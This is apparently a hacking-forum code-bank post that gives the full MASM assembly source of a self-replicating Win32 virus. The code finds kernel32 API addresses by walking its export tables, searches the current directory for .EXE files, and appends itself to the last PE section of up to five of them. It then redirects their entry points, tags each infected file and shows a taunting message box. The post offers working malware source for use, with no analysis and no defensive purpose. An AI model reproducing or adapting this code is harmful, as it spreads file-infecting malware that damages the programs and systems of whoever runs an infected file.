Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Win32 Virus - Assembly Code Bank


Win32 Virus
My little win32 virus, that infects .exe files in directory Compiler--MASM
                .386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

VirusSize      equ   (offset VirusEnd - offset VirusStart)
.data
OurTitle	 db "Message",0
OurMessage   db "This Is [Win32] Virus",10
			 db	"           by EdoVt",0

  
.code
VirusStart    label byte
start:
	nop
	nop
	pushad
	pushfd
	call delta
delta:
	pop ebp
	sub ebp,offset delta;; ebp=delta offset
	mov eax,[esp+24h];;eax==somewhere in Kernel32( CreateProcess) 
	
	call FuckTheK32
	call GetAPIz
	call Infect
	
    or ebp,ebp
	jz @1stGen;;;;;;First Generetion
	;;WE Can Fuck This File
	;;;Call Of LoadLibrary API
	lea eax,[USER32DLL+ebp]
	push eax
	call [ebp+_LoadLibraryA]
	;;;End Call eax==user32.dll	handle
	;;;Call of GetProcAddress
	lea ecx,[MESSAGEBOX+ebp]
	push ecx
	push eax
	call [ebp+_GetProcAddress]
	;;;;End Call  Eax==MessageBoxA Address
	
	;;;MessageBoxA  Call
	xor ebx,ebx
    push ebx
	lea ecx,[MesTitle+ebp]
	push ecx
	lea ecx,[Mess+ebp]
	push ecx
	push ebx
	call eax
	popfd
	popad
	mov eax,12345678h
	org $-4
ImageBase			dd 400000h
	add eax,12345678h
	org $-4
EntryPoint			dd 1000h
	jmp eax
	
	;;return to the host
	push 0
	call ExitProcess

Infect:
	and [ebp+Infections],00000000h
	lea eax,[@WinFindData+ebp]
	push eax
	lea eax,[SearchMask+ebp]
	push  eax
	call [ebp+_FindFirstFileA]
	inc eax
	or eax,eax
	jz FailInfect
	dec eax
	mov [ebp+SearchHandle],eax
	
InfectIt:
	push [ebp+EntryPoint]
	push [ebp+ImageBase]
	
	call Infection
	
	pop [ebp+ImageBase]
	pop [ebp+EntryPoint]
	
	inc [ebp+Infections]
	cmp [ebp+Infections],5
	jz CloseSearchHandle
	;;;;;;;;Its All Right
	nop
	lea edi,[@WinFindData.cFileName+ebp]
	mov ecx,MAX_PATH
	xor al,al
rep stosb
	lea eax,[ebp+@WinFindData]
	push eax
	push dword ptr [ebp+SearchHandle]
	call [ebp+_FindNextFileA]
	
	or eax,eax
	jnz InfectIt
	
CloseSearchHandle:
	push [ebp+SearchHandle]
	call [ebp+_FindClose]
FailInfect:
	ret
	
Infection:
	lea esi,dword ptr[ebp+@WinFindData.cFileName]
	push 80h
	push esi
	call [ebp+_SetFileAttributesA]
    call @OpenFile
	inc eax
	or eax,eax
	jz CantOpen
	dec eax;;eax==Current File handle
	mov [ebp+FileHandle],eax
	xor ecx,ecx
	call CreateMap
	or eax,eax
	jz CloseFile
	
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+@WinFindData.nFileSizeLow]
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]
	add esi,eax;;;;;PE header in esi
	mov eax,esi
	cmp word ptr[eax],'EP'
	jnz NoInfect
	;;;Yeah its PE file
	cmp dword ptr [eax-04h],'nooM';;;Is File Infected
	jz NoInfect
	push dword ptr [eax+3ch]
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	
	push    dword ptr [ebp+MapHandle]
    call    [ebp+_CloseHandle]
	
	pop ecx;;;File  ALign
	mov eax,[ebp+@WinFindData.nFileSizeLow]
	add eax,VirusSize
	
	call @@Align
	mov [ebp+NewSize],eax
	xchg ecx,eax
	call CreateMap
	or eax,eax
	jz CloseFile
	mov [ebp+MapHandle],eax
	mov ecx,[ebp+NewSize]
	
	call MapFile
	or eax,eax
	jz CloseMap
	mov [ebp+MapAddress],eax
	mov esi,[eax+3ch]
	add esi,eax;;;;;PE header in esi
	mov edi,esi
	add esi,78h;;Pointer to Directory table
	mov edx,[edi+74h];;Number of directories
	shl edx,3
	add esi,edx;;Pointer to 1st section
	movzx eax,word ptr [edi+06h]
	dec eax
	imul eax,eax,28h
	add esi,eax;;;;esi =====pointer to last the section
	
	mov eax,dword ptr[edi+28h];;;EntryPoint in eax
	mov dword ptr[ebp+EntryPoint],eax
	mov eax,dword ptr[edi+34h]
	mov dword ptr[ebp+ImageBase],eax
	
	mov edx,dword ptr[esi+10h];;Sizeofrawdata
	mov ebx,edx
	add edx,dword ptr[esi+14h];;edx=edx+Pointer to raw data
	
	push edx
	
	mov eax,dword ptr[esi+0ch];;eax===last section RVA
	add eax,ebx;;;;NewEIP
	mov dword ptr [ebp+OurEntryPoint],eax;;;New ENtryPoint
	mov dword ptr[edi+28h],eax;;Set New EntryPoint
	
	mov eax,dword ptr[esi+10h];;Size of raw data
	add eax,VirusSize
	push eax
	mov ecx,[edi+3ch]
	call @@Align
	mov dword ptr[esi+10h],eax;;;New Size of raw data
	
	mov ecx,[edi+038h]
	pop eax
	call @@Align
	shl eax,1
	mov dword ptr[esi+08h],eax;;New Virtual Size
	
	pop edx;;;;edx=SizeOfRawData+Pointer to raw data
    add     eax,dword ptr[esi+0Ch];;eax=eax+RVA(Last Section)               
    mov     dword ptr[edi+50h],eax;;;New SizeOfImage
	
	or dword ptr [esi+24h],0A0000020h;;;New attributes for last section
	
	mov dword ptr [edi-04h],"nooM";;Our LOGO
	
	lea esi,[ebp+start]
	
	mov edi,edx
	
	add edi,[ebp+MapAddress];;;edi=Pointer to place where go our virus
	
	mov ecx,VirusSize
	
rep	movsb
	
	push dword ptr [ebp+MapAddress]
	call [ebp+_UnmapViewOfFile]
	
	jmp CloseMap
	
	
NoInfect:
	dec word ptr [ebp+Infections]
CloseMap:
	push dword ptr [ebp+MapHandle]
	call [ebp+_CloseHandle]
CloseFile:
	push dword ptr [ebp+FileHandle]
	call [ebp+_CloseHandle]
CantOpen:
	push    dword ptr [ebp+@WinFindData.dwFileAttributes]
    lea     eax,[ebp+@WinFindData.cFileName]       
    push    eax
    call    [ebp+_SetFileAttributesA]
    ret

@@Align  proc
	xor edx,edx
	push eax
	div ecx
	pop eax
	or edx,edx
	jz Enough
	sub ecx,edx
	add eax,ecx
Enough:	ret
@@Align endp
	
	
MapFile    proc
	xor eax,eax
	push ecx
	push eax
	push eax
	push 02h
	push [ebp+MapHandle]
	call [ebp+_MapViewOfFile]
	ret
MapFile endp
	
	
	
		
	
CreateMap  proc
	xor eax,eax
	push eax
	push ecx
	push eax
	push 04h
	push eax
	push [ebp+FileHandle]
	call [ebp+_CreateFileMappingA]
	ret
CreateMap endp
	
	
	
	
@OpenFile    proc;;esi=pointer to the file name
	xor eax,eax
	push eax
	push eax
	push 03h
	push eax
	push 01h
	push 80000000h or 40000000h
	push esi
	call [ebp+_CreateFileA]
	ret
@OpenFile  endp

	
FuckTheK32	proc;;eax==somewhere in Kernel32( CreateProcess) 
	@loop:
	cmp word ptr [eax],"ZM";;Is It MZ header
	jz WeGotK32MZ
	dec eax;
	jmp @loop;;loop
WeGotK32MZ:	
	mov [Kernel_MZ+ebp],eax
	add eax,3ch;;[eax] === PE header offset
	mov eax,[eax];;eax===PE header offset
	add eax,[ebp+Kernel_MZ];;;Normalize
	cmp word ptr [eax],"EP"
	jz WeGotK32

	;;;Call of ExitProcess
	push 0
	call ExitProcess
WeGotK32:
	cld
	mov [Kernel_PE+ebp],eax
	mov esi,eax;;esi=Kernel_PE
	add esi,78h
	lodsd;;;; eax=RVA of Export Table
	add eax,[Kernel_MZ+ebp];;;Normalize
	mov esi,eax
	add esi,1ch
	lodsd;;;eax==RVA of Export Address   table 
	add eax,[Kernel_MZ+ebp];;Normalize that
	mov [ExpAddrTableVA+ebp],eax;;Keeping
	lodsd;;eax==RVA of Export Names pointer table
	add eax,[Kernel_MZ+ebp];;Normalizing
	mov [ExpNameTableVA+ebp],eax
	lodsd
	add eax,[Kernel_MZ+ebp]
	mov [ExpOrdinalTableVA+ebp],eax
	ret

FuckTheK32 endp
	
;;;;;;;;;;;;;;;;;Function to Get the APIs Addressis	
GetAPIz		proc
	cld
	lea ebx,[OurAPIz+ebp]
	lea edi,[OurFuncz+ebp]
begin:
	push edi
	mov [Counter+ebp],0
	xor ecx,ecx
	mov esi,ebx
@_1: lodsb
	inc ecx
	or al,al
	jnz @_1
	mov edx,ecx
	mov edi,ebx
	mov esi,[ExpNameTableVA+ebp]
	push esi
@_2:lodsd
	mov esi,eax
	add esi,[Kernel_MZ+ebp]
    repe cmpsb
	jz TheyAreEqual
	pop esi
	add esi,4
	push esi
	mov edi,ebx
	mov ecx,edx
	inc word ptr [Counter+ebp]
	jmp @_2
TheyAreEqual:
	pop esi
	pop edi
	xor esi,esi
	add ebx,edx
	xor eax,eax
	mov si,[Counter+ebp]
	shl esi,1
	add esi,[ExpOrdinalTableVA+ebp]
	lodsw
	mov esi,eax
	shl esi,2
	add esi,[ExpAddrTableVA+ebp]
	lodsd
	add eax,[Kernel_MZ+ebp]
	stosd
	cmp dword ptr [ebx],"jreV"
	jnz begin
	ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
	
	
	
	
Infections			db 0
OurEntryPoint		dd 1000h
Counter				dw 0
USER32DLL			db "user32.dll",0
MESSAGEBOX			db "MessageBoxA",0
MesTitle			db "Got Ya !!!!!!!!!!!!!",0
Mess				db "Everything under the sun is in tune,",10
					db	"But the sun is eclipsed by the MOON.",10
					db	"                               Pink Floyd",10,10
					db	"This File Is Infected By ",0
SearchMask			db '*.EXE',0

OurAPIz		label byte
@FindFirstFileA		db "FindFirstFileA",0
@FindNextFileA		db "FindNextFileA",0
@FindClose			db "FindClose",0
@CloseHandle		db "CloseHandle",0
@CreateFileA		db "CreateFileA",0
@SetFilePointer		db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile		db "MapViewOfFile",0
@UnmapViewOfFile	db "UnmapViewOfFile",0
@SetEndOfFile		db "SetEndOfFile",0
@LoadLibraryA		db "LoadLibraryA",0
@GetProcAddress		db "GetProcAddress",0
					db "Verj",0
VirusEnd    label byte
OurFuncz	label byte
_FindFirstFileA		dd 0
_FindNextFileA		dd 0
_FindClose			dd 0
_CloseHandle		dd 0
_CreateFileA		dd 0
_SetFilePointer     dd 0
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile		dd 0
_UnmapViewOfFile    dd 0
_SetEndOfFile		dd 0
_LoadLibraryA		dd 0
_GetProcAddress     dd 0
@WinFindData		WIN32_FIND_DATA  <>
SearchHandle		dd ?
FileHandle			dd ?
MapHandle			dd ?
MapAddress			dd ?
NewSize				dd ?
OurDelta			dd ?
HostStart           dd ?
Kernel_MZ	 		dd ?
Kernel_PE	 		dd ?
ExpAddrTableVA 		dd ?
ExpNameTableVA 		dd ?
ExpOrdinalTableVA	dd ?



@1stGen:
	popfd
	popad
	xor eax,eax
	push eax
	push offset OurTitle
	push offset OurMessage
	push eax
	call MessageBoxA
	
	push 0
	call ExitProcess
	
end start


            
Comments
Sorry but there are no comments to display